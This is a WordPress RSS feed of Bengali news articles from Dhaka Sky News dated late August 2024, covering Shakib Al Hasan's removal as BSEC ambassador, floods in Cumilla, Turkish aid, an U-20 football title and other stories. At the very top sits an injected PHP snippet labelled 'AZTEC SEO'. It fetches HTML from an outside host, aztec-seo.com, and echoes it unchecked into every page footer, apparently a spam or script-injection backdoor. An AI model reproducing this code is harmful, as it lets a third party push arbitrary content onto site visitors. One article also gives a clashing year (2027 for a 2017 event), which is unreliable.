/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); আলতাফ হোসেন জাকির – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Thu, 29 Aug 2024 07:17:28 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 সাকিবকে শুভেচ্ছাদূত থেকে বাদ দিল বিএসইসি https://www.dhakaskynews.com/business/2024/08/29/News_ID-5475/ https://www.dhakaskynews.com/business/2024/08/29/News_ID-5475/#respond Thu, 29 Aug 2024 07:17:28 +0000 https://www.dhakaskynews.com/?p=5475 ক্রিকেট তারকা অলরাউন্ডার সাকিব আল হাসানকে নিজেদের শুভেচ্ছাদূত থেকে বাদ দিল পুঁজিবাজার নিয়ন্ত্রক সংস্থা বাংলাদেশ সিকিউরিটিজ অ্যান্ড এক্সচেঞ্জ কমিশন (বিএসইসি)। সাকিবের ওপর বেশ কিছু অভিযোগ ওঠায় তাকে নিজেদের শুভেচ্ছাদূত থেকে বাদ দিয়েছে বিএসইসি।

বুধবার ২৯ আগস্ট ২০২৪ বিএসইসির কমিশন সভায় এ সিদ্ধান্ত নেওয়া হয়। বিএসইসি সূত্র জানিয়েছে, বাংলাদেশ জাতীয় ক্রিকেট দলের অলরাউন্ডার সাকিব আল হাসান ছিলেন বিএসইসির ‘দেশব্যাপী বিনিয়োগ শিক্ষা কার্যক্রমের’ শুভেচ্ছাদূত। ২০১৭ সালে সাকিব আল হাসানকে এ কার্যক্রমের সঙ্গে যুক্ত করে বিএসইসি।

গত ২০২৭ সালের অক্টোবরে রাজধানীর শিল্পকলা একাডেমিতে আয়োজিত বিশ্ব বিনিয়োগকারী সপ্তাহের উদ্বোধনী অনুষ্ঠানে সাকিবকে শুভেচ্ছাদূত হিসেবে ঘোষণা করে বিএসইসি। ওই সময় বিএসইসির চেয়ারম্যানের দায়িত্বে ছিলেন এম খায়রুল হোসেন।

বিএসইসির ২০২০ সালে অধ্যাপক শিবলী রুবাইয়াত–উল–ইসলাম বিএসইসির নতুন চেয়ারম্যান হলেও শুভেচ্ছাদূত হিসেবে বহাল রাখা হয় সাকিবকে। এ সময় পুঁজিবাজারের একজন আলোচিত বিনিয়োগকারী হিসেবেও আত্মপ্রকাশ ঘটে সাকিব আল হাসানের।

জানা যায়, পুঁজিবাজারের আলোচিত কারসাজিকারক আবুল খায়ের হিরুর সঙ্গে মিলে পুঁজিবাজারের বড় বিনিয়োগকারী হয়ে যান সাকিব। গত চার থেকে পাঁচ বছরে পুঁজিবাজারে যেসব শেয়ার নিয়ে আবুল খায়ের হিরু সবচেয়ে বেশি কারসাজির ঘটনা ঘটিয়েছেন, এসব কোম্পানির শেয়ারে সাকিবেরও বিনিয়োগ ছিল।

]]>
https://www.dhakaskynews.com/business/2024/08/29/News_ID-5475/feed/ 0
কুমিল্লায় বন্যা পরিস্থিতির উন্নতি https://www.dhakaskynews.com/uncategorized/2024/08/29/News_ID-5472/ https://www.dhakaskynews.com/uncategorized/2024/08/29/News_ID-5472/#respond Thu, 29 Aug 2024 06:52:48 +0000 https://www.dhakaskynews.com/?p=5472 গোমতী নদীর পানি বিপৎসীমার ৫৯ সেন্টিমিটার নিচ দিয়ে প্রবাহিত হচ্ছে। এতে কুমিল্লায় বন্যা পরিস্থিতির উন্নতি হয়েছে। এছাড়া গত কয়েকদিনে বৃষ্টি না হওয়ায় এবং উজান থেকে পানি না আসায় পানির স্তর নামছে।

গোমতীর বুরবুড়িয়া বাঁধের ভাঙা অংশ দিয়ে পানি বের হয়ে যাওয়ায় বুড়িচং ব্রাহ্মণপাড়া উপজেলার পানি কমছে। এছাড়া কুমিল্লার দক্ষিণাঞ্চল লাকসাম, মনোহরগঞ্জ ও চৌদ্দগ্রাম উপজেলার পরিস্থিতির উন্নতি হচ্ছে।

কুমিল্লা জেলা প্রশাসন সূত্র জানায়, জেলায় ১০ লাখ ৭৮ হাজার মানুষ পানিবন্দী রয়েছে। ৭২৪টি আশ্রয়কেন্দ্রে ৭৮ হাজারেরও বেশি মানুষ আশ্রয় নিয়েছে।

 

]]>
https://www.dhakaskynews.com/uncategorized/2024/08/29/News_ID-5472/feed/ 0
বন্যার্তদের জন্য ত্রাণ পাঠাল তুরস্ক https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5469/ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5469/#respond Thu, 29 Aug 2024 05:58:32 +0000 https://www.dhakaskynews.com/?p=5469 ড. মুহাম্মদ ইউনূস অন্তর্বর্তীকালীন সরকারের প্রধান হিসেবে দায়িত্ব গ্রহণ করায় মঙ্গলবার ফোন করে অভিনন্দন জানান তুরস্কের প্রেসিডেন্ট রিসেপ তাইয়্যেপ এরদোগান। এ সময় দেশ পুনর্গঠন এবং বন্যা কবলিত মানুষদের মানবিক সহায়তার ঘোষণা দেন তিনি।

এর একদিন পর বুধবার বন্যার্তদের জন্য ১৬ হাজার ৭৫০ প্যাকেট ত্রাণ সরবরাহ করেছে তুরস্ক। বুধবার তুর্কি গণমাধ্যম টিআরটি ওয়ার্ল্ড তাদের এক প্রতিবেদনে এ তথ্য জানায়।

একইসঙ্গে বন্যায় প্রাণহানিতে সমবেদনা প্রকাশ করে আহত ও ক্ষতিগ্রস্তদের দ্রুত আরোগ্য কামনা করেছেন এরদোগান। নিজের এক্স (আগের টুইটার) হ্যান্ডলে বন্যা কবলিত অঞ্চলের একটি ভিডিও প্রকাশ করেছেন তুর্কি রাষ্ট্রপ্রধান।

ওই ভিডিওর ক্যাপশনে এরদোগান বলেন, ‘আমরা আমাদের বন্ধু ও ভাই বাংলাদেশের প্রতি তুরস্কের সাহায্যের হাত বাড়িয়ে দিচ্ছি। তারা বন্যায় কঠিন সময় পার করছে। কঠিন সময়ে আমরা আমাদের বাংলাদেশি ভাইবোনদের একা ছেড়ে দিচ্ছি না। তারা বড় ধরনের ক্ষতির মুখোমুখি হয়েছে, আমরা তাদের এই ক্ষতি নিরাময়ের জন্য পাশে থাকবো।’

এরদোগান আরও বলেন, ‘আমি আল্লাহর কাছে প্রার্থনা করি, যারা এই দুর্যোগে প্রাণ হারিয়েছেন, সৃষ্টিকর্তা তাদের রহমত দান করুন। আহতদের দ্রুত আরোগ্য কামনা করছি। আমরা সব সময় তাদের পাশে আছি’।

]]>
https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5469/feed/ 0
বিমানবন্দরে মাহিকে দীর্ঘ সময় জিজ্ঞাসাবাদ https://www.dhakaskynews.com/enternainment/2024/08/29/News_ID-5466/ https://www.dhakaskynews.com/enternainment/2024/08/29/News_ID-5466/#respond Thu, 29 Aug 2024 05:36:49 +0000 https://www.dhakaskynews.com/?p=5466 রাজধানীর হযরত শাহ জালাল আন্তর্জাতিক বিমান বন্দরে গিয়ে বিপাকে পড়েছিলেন ঢাকাই চলচ্চিত্রের আলোচিত চিত্রনায়িকা মাহিয়া মাহি। সেখানে তাকে কয়েক ঘণ্টা অপেক্ষায় রাখা হয় এবং জিজ্ঞাসাবাদ করা হয়। অপরাধীদের তালিকায় নাম রয়েছে কিনা তা যাচাই করা হয়।

সম্প্রতি ফেসবুকে এক ভিডিওবার্তায় অভিনেত্রী জানান, বিমানবন্দরে বিভিন্ন গোয়েন্দা সংস্থার রিপোর্টে তার নাম আছে কিনা তা খতিয়ে দেখা হয়েছে। এক থেকে দেড় ঘণ্টা হবে, আমি জাস্ট বসেছিলাম। কারণ কর্তৃপক্ষ নিশ্চিত হতে চাইছিল আমার বিরুদ্ধে কোনো অভিযোগ আছে কিনা। ডিজিএফআই, এনএসআইসহ বিভিন্ন গোয়েন্দা সংস্থার রিপোর্ট ভালোভাবে চেক করার পরই ফ্লাই করতে পেরেছি।

পুরো বিষয়টিকে ইতিবাচকভাবেই দেখছেন বলে জানিয়েছেন এই অভিনেত্রী। তিনি মনে করেন, দেশের সার্বিক অবস্থা বিবেচনায় কড়া নিরাপত্তা ব্যবস্থা মন্দ কিছু নয়।

প্রসঙ্গত, বৈষম্যবিরোধী ছাত্র আন্দোলনে শিক্ষার্থী-জনতার তোপের মুখে গত ৫ আগস্ট পদত্যাগ করেন শেখ হাসিনা। তার দেশত্যাগের খবর ছড়িয়ে পড়তেই আওয়ামী লীগ এবং দলটির সহযোগী অঙ্গসংগঠনের বিভিন্ন স্তরের নেতাকর্মীরাও দেশ ছাড়ার চেষ্টা করেন। কেউ কেউ আত্মগোপনেও চলে যান। যদিও ইতোমধ্যে কয়েকজন নেতাকর্মীকে গ্রেপ্তার করেছে আইনশৃঙ্খলা রক্ষাকারী বাহিনী।

আওয়ামী লীগ সরকার পতনের পর কোনো ধরনের অপরাধী যেন দেশ ছাড়তে না পারে, এ জন্য বিভিন্ন পর্যায়ে নিরাপত্তা জোরদার করা হয়েছে। সেই ধারাবাহিবতায় বিমানবন্দরেও নজরদারির ব্যবস্থা করা হয়েছে।

]]>
https://www.dhakaskynews.com/enternainment/2024/08/29/News_ID-5466/feed/ 0
আরব-আমেরিকান ভোট পেতে নয়া কৌশল কমলার https://www.dhakaskynews.com/international/2024/08/29/News_ID-5462/ https://www.dhakaskynews.com/international/2024/08/29/News_ID-5462/#respond Thu, 29 Aug 2024 05:18:17 +0000 https://www.dhakaskynews.com/?p=5462 মার্কিন যুক্তরাষ্ট্রের ৬০তম চতুর্বার্ষিক রাষ্ট্রপতি নির্বাচন আগামী ৫ নভেম্বর ২০২৪ বুধবারে অনুষ্ঠিত হবে। এ নির্বাচন সামনে রেখে এখন প্রচারণায় ব্যস্ত সময় পার করছেন প্রেসিডেন্ট প্রার্থী কমলা হ্যারিস। তবে এ ক্ষেত্রে তাদের বড় চ্যালেঞ্জ আরব-আমেরিকান প্রার্থীদের তাদের পক্ষে আনা। যা করতেই এবার ব্রেন্ডা আবদেলালকে ভাড়া করেছেন ডেমোক্র্যাট প্রার্থী কমলা হ্যারিস।

এমনটির কারণ, বর্তমান ক্ষমতাসীন ডেমোক্র্যাট প্রেসিডেন্ট জো বাইডেন সরকার গাজায় গণহত্যা চালাতে ইসরাইলকে সমর্থন দিয়েছে। যার ফলে বাইডেন প্রশাসনের ওপর ক্ষোভ রয়েছে দেশটিতে অবস্থানরত আরব আমেরিকান ও মুসলিম ভোটারদের।

তাই এই অবস্থায় গত কিছু দিন ধরে ইসরাইল ইস্যুতে সুর নরম করেছেন বাইডেন ও তার দল। সেই সঙ্গে আরব ভোটারদের আকৃষ্ট করতে প্রচারণায় একজন মিশরীয় আমেরিকান আইনজীবী এবং হোমল্যান্ড সিকিউরিটি বিভাগের প্রাক্তন কর্মকর্তাকে নিয়োগ করেছেন কমলা।

আরব আমেরিকান ভোটারদের কাছে পৌঁছাতে চায় কমলা। তাই ব্রেন্ডা আবদেলালকে নিয়োগ দেওয়া হয়। আর এটি হলে কিছু রাজ্যে প্রভাব বিস্তার করতে পারবেন তিনি, যা ৫ নভেম্বরের নির্বাচনের সিদ্ধান্ত নিতে সাহায্য করতে পারে তাকে।

শুধু আরব ভোটারদেরই নয়, মুসলিম আমেরিকানদের কাছে পৌঁছানোর জন্য প্রতিনিধি নিয়োগ দিয়েছেন ডেমোক্র্যাট প্রার্থী কমলা। ইতিমধ্যে আফগান-আমেরিকান আইনজীবী নাসরিনা বার্গজিকে নিয়োগ করা হয়েছে প্রার্থীদের ডেমোক্র্যাট দলের ওপর আস্থা ফেরাতে।

দুটি সূত্র বার্তা সংস্থা রয়টার্সকে এ তথ্য জানিয়েছে।

]]>
https://www.dhakaskynews.com/international/2024/08/29/News_ID-5462/feed/ 0
নেপালকে হারিয়ে সাফ চ্যাম্পিয়ন বাংলাদেশ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/ https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/#respond Thu, 29 Aug 2024 04:52:29 +0000 https://www.dhakaskynews.com/?p=5458 অনূর্ধ্ব-২০ সাফ চ্যাম্পিয়নশিপে স্বাগতিক নেপালকে ৪-১ গোলে হারিয়ে প্রথমবারের মতো চ্যাম্পিয়ন বাংলাদেশের যুবারা।

টুর্নামেন্টের গ্রুপ পর্বে এই নেপালের বিপক্ষে ২-১ ব্যবধানে হারতে হয়েছিল যুবাদের। তাই ফাইনালের আগে বাড়তি স্নায়ুচাপ ছিল মিরাজুলদের। তবে শেষ পর্যন্ত ওই চাপ সামলে দাপটের সাথেই শিরোপা জয় করেছে মারুফুল হকের শিষ্যরা।

নেপালের আনফা কমপ্লেক্সে প্রথমার্ধে দাপট দেখিয়েছিল স্বাগতিক নেপাল। কিন্তু গোল তাদের জন্য সোনার হরিণ হয়ে থেকেছে।

বিপরীতে দারুণ এক ফ্রি কিক থেকে এগিয়ে যায় বাংলাদেশ। বক্সের বাইরে থেকে মিরাজুলের ফ্রি কিক থেকে নেওয়া বাঁকানো শট সাইড পোস্টের ভেতরে লেগে জালে জড়িয়ে যায়। এই গোলের লিড নিয়ে প্রথমার্ধের খেলা শেষ হয়।

দ্বিতীয়ার্ধে বাংলাদেশ আক্রমণের তেজ বাড়ায়। তাই আরও তিন গোল করতে সক্ষম হয় সফরকারীরা। প্রথম গোলের কারিগর মিরাজুলের পায়েই দ্বিতীয় গোল হয়। আসাদুল ইসলাম সাকিবের ক্রসে আসাদুল মোল্লা হেড করে গোলমুখে দেন, মিরাজ চলতি বলে মাথা ছুঁইয়ে বল জালে পাঠান।

প্রথম দুই গোল করা মিরাজুল দলের তৃতীয় গোলটি করান রাব্বি হাসান রাহুলকে দিয়ে। তার পাস ধরেই আনমার্কড অবস্থায় থাকা রাহুল ডান পায়ের নিখুঁত শটে গোল করে বাংলাদেশের জয় একপ্রকার নিশ্চিত করে ফেলেন।

স্বাগতিকদের বেহাল দশা দেখে ক্ষিপ্ত হয়ে মাঠে বোতল ছুঁড়ে মারেন নেপালি সমর্থকরা। যার ফলে খেলা কিছু সময় বন্ধও থাকে। দর্শকরা তাঁতিয়ে দেওয়ার পর নেপালি ফুটবলারদের খেলায় প্রাণ ফিরে আসে। ম্যাচের শেষভাগে একটি গোল পেয়ে যায় তারা।

পরে ১০ মিনিট যোগ করা সময় পেলেও আর গোল করতে পারেনি স্বাগতিকরা। উল্টো শেষদিকে পিয়াস আহমেদ নোভা বল জালে জড়ালে বড় জয়ে শিরোপা উৎসব করে লাল-সবুজের প্রতিনিধিরা।

দেশের খ্যাতিমান কোচ মারুফুল হকের অধীনে এবারই প্রথম অনূর্ধ্ব-২০ সাফের শিরোপা জয় করল বাংলাদেশের দামালরা।

]]>
https://www.dhakaskynews.com/bangladesh/2024/08/29/News_ID-5458/feed/ 0
তেজগাঁওয়ে প্রধান উপদেষ্টার কার্যালয় প্রস্তুত https://www.dhakaskynews.com/bangladesh/2024/08/28/News_ID-5455/ https://www.dhakaskynews.com/bangladesh/2024/08/28/News_ID-5455/#respond Wed, 28 Aug 2024 09:26:04 +0000 https://www.dhakaskynews.com/?p=5455 অন্তর্বর্তীকালীন সরকার প্রধান ড. মুহাম্মদ ইউনূসের জন্য টানা ১৫ দিন সংস্কার কাজ করে প্রস্তুত করা হয়েছে তার কার্যালয়।

রাজধানীর তেজগাঁওয়ে অবস্থিত সাবেক প্রধানমন্ত্রীর কার্যালয়টি এখন প্রধান উপদেষ্টার কার্যালয় হিসাবে ব্যবহৃত হবে।

বহুল আলোচিত এ কার্যালয়ের বাইরে-ভেতরে নামফলকও পরিবর্তন করা হয়েছে। বাড়ানো হয়েছে নিরাপত্তা ব্যবস্থাও।

প্রধান উপদেষ্টা ড. মুহাম্মদ ইউনূস বৃহস্পতিবার উপদেষ্টাদের নিয়ে প্রথম বৈঠক করার কথা রয়েছে।

সরকার প্রধান হিসাবে সাবেক প্রধানমন্ত্রী যে কক্ষ ব্যবহার করতেন প্রধান উপদেষ্টাও সেই কক্ষ ব্যবহারের উপযোগী করা হয়েছে।

গণপূর্ত অধিদপ্তরের কর্মকর্তারা জানিয়েছেন, ৫ আগস্ট গণঅভ্যুত্থানে অংশ নেওয়া বিক্ষুব্ধ ছাত্র-জনতার ক্ষোভের বহির্প্রকাশ ঘটেছিল প্রধানমন্ত্রীর এই কার্যালয়, গণভবন, জাতীয় সংসদ ভবনসহ গুরুত্বপূর্ণ স্থাপনায়।

এই কার্যালয়ে ক্ষয়ক্ষতির সংস্কার করতে প্রাথমিকভাবে প্রায় ৫০ কোটি টাকা খরচ হয়েছে।

গণপূর্ত অধিদপ্তরের প্রধান প্রকৌশলী মোহাম্মদ শামীম আক্তারকে প্রধান ও প্রধান উপদেষ্টার কার্যালয়ের পরিচালক মনিরুজ্জামানকে সদস্য সচিব করে সংস্কারমূলক কাজ পরিচালনা করা হয়।

সংস্কার কাজ করার সময় সেখানে কঠোর নিরাপত্তা ব্যবস্থা গ্রহণ করা হয়। ইলেকট্রিক্যাল, সিভিল, কম্পিউটার, সিকিউরিটি ও রংয়ের সম্পূর্ণ কাজ করতে হয়েছে।

প্রধান উপদেষ্টার সংশ্লিষ্ট সব কর্মকর্তাদের বসার কক্ষও ঠিকঠাক করা হয়েছে।

কর্মকর্তারা জানিয়েছেন, রেড জোন, সচিব, পরিচালক, বিভিন্ন গোয়েন্দা সংস্থার অফিসসহ শুধু প্রধানমন্ত্রীর কার্যালয়ের ক্ষতির পরিমাণ অন্তত শতকোটি টাকার উপরে।

কিছু কিছু ফার্নিচার সংস্কার করে ব্যবহার উপযোগী করা গেলেও অনেক কিছুই ফেলে দিতে হয়েছে। যেহেতু পরবর্তী সরকারপ্রধান এই অফিসেই বসবেন তাই প্রধানমন্ত্রীর কার্যালয়কে সম্পূর্ণ সংস্কার করার মতামত দিয়েছেন প্রধান উপদেষ্টা ড. মুহাম্মদ ইউনূস।

কারণ অন্তর্বর্তীকালীন সরকারের প্রধান উপদেষ্টার কার্যালয় হিসাবে অন্য কোনো ভবন সাজাতে গেলেও অনেক খরচের প্রয়োজন।

ড. মুহাম্মদ ইউনূস মনে করেন, পরবর্তী সরকার প্রধান উপদেষ্টার কার্যালয় হিসাবে অন্য ভবন প্রস্তুত করলে পরবর্তী সরকার তা ব্যবহার নাও করতে পারে। তাই অপচয় ঠেকাতে প্রধানমন্ত্রীর কার্যালয়কে ব্যবহার উপযোগী করার নির্দেশ দেওয়া হয়।

জানা যায়, ১৯৯১ সাল থেকে ঢাকা শহরের তেজগাঁওর পুরোনো জাতীয় সংসদ ভবনটি প্রধানমন্ত্রীর কার্যালয় হিসাবে ব্যবহৃত হচ্ছে।

সদ্য বিদায়ি প্রধানমন্ত্রী সাধারণত এখানে প্রতিদিন সরকারি কার‌্যাবলী সম্পাদন করতেন। এখানেই মন্ত্রিসভার বেশিরভাগ বৈঠক অনুষ্ঠিত হয়েছে।

তবে বাংলাদেশ সচিবালয়েও প্রধানমন্ত্রীর সরকারি দপ্তর রয়েছে। সেখানেও বিদায়ি প্রধানমন্ত্রী মাঝেমধ্যে অফিস করতেন। মন্ত্রিসভার বৈঠকও হয়েছে।

]]>
https://www.dhakaskynews.com/bangladesh/2024/08/28/News_ID-5455/feed/ 0
ইউসিবি ব্যাংকে নতুন পর্ষদ গঠিত https://www.dhakaskynews.com/business/2024/08/28/News_ID-5452/ https://www.dhakaskynews.com/business/2024/08/28/News_ID-5452/#respond Wed, 28 Aug 2024 08:23:30 +0000 https://www.dhakaskynews.com/?p=5452 ইউনাইটেড কমার্শিয়াল ব্যাংকের (ইউসিবি) পর্ষদ ভেঙে দিয়ে নতুন পর্ষদ গঠন করেছে বাংলাদেশ ব্যাংক।

মঙ্গলবার ২৭ আগস্ট নতুন পর্ষদ গঠিত হয়েছে। একই সঙ্গে ব‌্যাংকটি‌তে স্বতন্ত্র প‌রিচালকও নিয়োগ দেওয়া হয়েছে।

ব্যাংকটির ব্যবস্থাপনা পরিচালকের কাছে পাঠানো আদেশে বলা হয়, আমানতকারী ও ব্যাংকের স্বার্থ সংরক্ষণ ও সুশাসন নিশ্চিত করতে ব্যাংকের পরিচালনা পর্ষদ ভেঙে নতুন পর্ষদ গঠন করা হয়েছে।

নয়া পর্ষদের পরিচালক হলেন-ইউনাইটেড কমার্শিয়াল ব্যাংকের শেয়ারহোল্ডার শরীফ জহীর, শেয়ারহোল্ডার মো. তানভীর খান।

এই দুজনকে যথাক্রমে ন্যাশনাল ফাইন্যান্স লিমিটেড এবং ইস্টল্যান্ড ইনস্যুরেন্স কোম্পানি লিমিটেডের পরিচালনা পর্ষদ হতে পদত্যাগের শর্তে নিয়োগ দেওয়া হয়েছে।

এছাড়া স্বতন্ত্র পরিচালক হিসেবে নিয়োগ পেয়েছেন বাংলাদেশ ব্যাংকের সাবেক নির্বাহী পরিচালক মো. সাজ্জাদ হোসেন, অগ্রণী ব্যাংকের সাবেক উপব্যবস্থাপনা পরিচালক মো. ইউসুফ আলী এবং চার্টার্ড অ্যাকাউন্টেন্ট ওবায়দুর রহমান।

]]>
https://www.dhakaskynews.com/business/2024/08/28/News_ID-5452/feed/ 0
পূর্ণদৈর্ঘ্য চলচ্চিত্র নিয়ে উচ্ছ্বসিত মেহজাবিন https://www.dhakaskynews.com/enternainment/2024/08/28/News_ID-5449/ https://www.dhakaskynews.com/enternainment/2024/08/28/News_ID-5449/#respond Wed, 28 Aug 2024 08:10:22 +0000 https://www.dhakaskynews.com/?p=5449 মেহজাবিন চৌধুরী। ছোট পর্দায় টানা কয়েক বছর কাজ করে নাটকের শীর্ষ অভিনেত্রীর তালিকায় উঠে এসেছেন তিনি।

ভার্সেটাইল অভিনেত্রী হিসেবে নানা চরিত্রে নিজেকে প্রমাণ করেছেন। এরপর অবশ্য গতানুগতিক গল্প এবং নতুনদের সুযোগ দেয়ার জন্য নাটকে কাজ প্রায় বন্ধই করে দেন।

মনের মতো হলে সিনেমা কিংবা ওয়েবের কাজ করবেন বলেও জানান তিনি। পাশাপাশি বিজ্ঞাপনে নিয়মিত কাজ করছেন।

এদিকে নতুন খবর হলো, মেহজাবিন এরইমধ্যে তার অভিনীত প্রথম পূর্ণদৈর্ঘ্য চলচ্চিত্রের কাজ শেষ করে ফেলেছেন।

শুধু তাই নয়, ‘সাবা’ নামের এ সিনেমাটি টরন্টো আন্তর্জাতিক চলচ্চিত্র উৎসবে অফিশিয়ালি নির্বাচিত হয়েছে।

৭ই সেপ্টেম্বর প্রথমবারের মতো আন্তর্জাতিকভাবে প্রদর্শিত হবে ছবিটি। ছবিটির পরিচালক মাকসুদ হোসাইন।

মেহজাবিন জানান, তিনি ৮ সেপ্টেম্বর ছবিটির দ্বিতীয় প্রদর্শনীটি সবার সঙ্গে উপভোগ করবেন। বিষয়টি নিয়ে বেশ উচ্ছ্বসিত।

তিনি বলেন, আমার প্রথম সিনেমায় আমি চেয়েছিলাম এমন একটা চরিত্রকে পর্দায় ফুটিয়ে তুলতে যা অডিয়েন্সকে অন্তত অল্প কিছু সময়ের জন্য হলেও ভাবায় এবং অবশ্যই যে চরিত্র দেশীয় ও আন্তর্জাতিক দুই পরিসরের দর্শকের সঙ্গেই মেলবন্ধন তৈরি করে।

মেহজাবিন জানান, আমি সৌভাগ্যবান যে, আমার সেই চেষ্টা, সেই ইচ্ছা বাস্তবে রূপ পেয়েছে।

কানাডায় অবস্থানরত আমার সকল ভক্ত এবং শুভাকাঙ্ক্ষীদের জানাতে চাই, আমার টিমের সঙ্গে ‘সাবা’ এর ওয়ার্ল্ড প্রিমিয়ার দেখার সুযোগ আপনারাই সর্বপ্রথম পেতে যাচ্ছেন।

আশা করছি নিজের দেশের সিনেমা আন্তর্জাতিক ফেস্টিভ্যালে দেখার অনুভূতি আপনাদের উপস্থিতির কারণে দ্বিগুণ হয়ে যাবে।

]]>
https://www.dhakaskynews.com/enternainment/2024/08/28/News_ID-5449/feed/ 0
শিরোপাই লক্ষ্য বাংলাদেশের https://www.dhakaskynews.com/sports/2024/08/28/News_ID-5446/ https://www.dhakaskynews.com/sports/2024/08/28/News_ID-5446/#respond Wed, 28 Aug 2024 07:47:33 +0000 https://www.dhakaskynews.com/?p=5446 আজ জিতলেই শিরোপা উঠবে পিয়াস আহমেদদের হাতে। দু’দিন আগে পাকিস্তানকে প্রথমবারের মতো টেস্টে হারিয়েছে বাংলাদেশ। শান্তরা পাকিস্তানের মাটিতে ম্যাচটি জিতেছে ১০ উইকেটের বড় ব্যবধানে।

পাকিস্তানের বিপক্ষে পাওয়া ঐতিহাসিক জয়টা বৈষম্যবিরোধী ছাত্র আন্দোলনে পুলিশের গুলিতে নিহতদের উৎসর্গ করেছিলেন অধিনায়ক নাজমুল হাসান শান্ত।

সাফ অনূর্ধ্ব-২০ চ্যাম্পিয়নশিপেও ছাত্র আন্দোলনে নিহত আবু সাঈদ-মুগ্ধদের স্মরণ করেন বাংলাদেশি ফুটবলার। এবার তাদের জন্য ট্রফি নিয়ে আসতে চাইছেন তারা। সেখানে তাদের বাধা নেপাল।

স্বাগতিকদের বিপক্ষে বাংলাদেশ সময় বেলা পৌনে তিনটায় আনফা কমপ্লেক্সে ম্যাচটি শুরু হবে।

বয়সভিত্তিক এই প্রতিযোগিতাটি এ পর্যন্ত অনূর্ধ্ব-১৮, ১৯ ও ২০ এই তিন ক্যাটাগরিতে হয়েছে।

২০২২ সালে অনূর্ধ্ব-২০ ক্যাটাগরিতে ভারতের কাছে হেরে রানার্সআপ হয়েছিল বাংলাদেশ। এবার তাদের হারিয়েই ফাইনালে উঠেছেল মিরাজুল আসাদুলরা। এবার সেই আক্ষেপ মেটাতে চান কোচ মারুফুল হকের শিষ্যরা।

আজ জিততে পারলেই শিরোপা উঠবে পিয়াস আহমেদদের হাতে। মাঠে নামার আগে প্রতিপক্ষ হিসেবে নেপাল ভাবাচ্ছে লাল সবুজের শিবিরকে।

একই গ্রুপে থাকায় গ্রুপ পর্বেও দেখা হয়েছিল এই দুই দলের। যেখানে জয় নিয়ে মাঠ ছাড়া হয়নি বাংলাদেশের। হেরেছিল ২-১ গোলে। তবে ওই ম্যাচের ভুল শুধরে সেমিফাইনালে ভারতের বিপক্ষে জিতে ঘুরে দাঁড়িয়েছে বাংলাদেশের যুবারা।

ফাইনালেও শিষ্যদের সেই ধারাবাহিকতা দেখতে চান বাংলাদেশের কোচ মারুফুল হক।

তিনি বলেন, ‘আমাদের লক্ষ্য ছিল ফাইনাল খেলবো, চ্যাম্পিয়ন হবো। যদিও গ্রুপ পর্বে নেপালের কাছে হেরেছি। এরপর খেলোয়াড়দের নানাভাবে উজ্জীবিত করেছি। ভারতের বিপক্ষে জিতে এখন স্বপ্নের শেষ ধাপে আমরা। নেপালকে হারাতে পারলেই শিরোপা নিয়ে দেশে ফিরতে পারবো।’

তিনি যোগ করেন, ‘নেপাল ভালো দল। তাদের বেশ ক’জন মেধাবী খেলোয়াড়ও আছে। আশা করি ফাইনাল প্রতিদ্বন্দ্বিতাপূর্ণ হবে।’

]]>
https://www.dhakaskynews.com/sports/2024/08/28/News_ID-5446/feed/ 0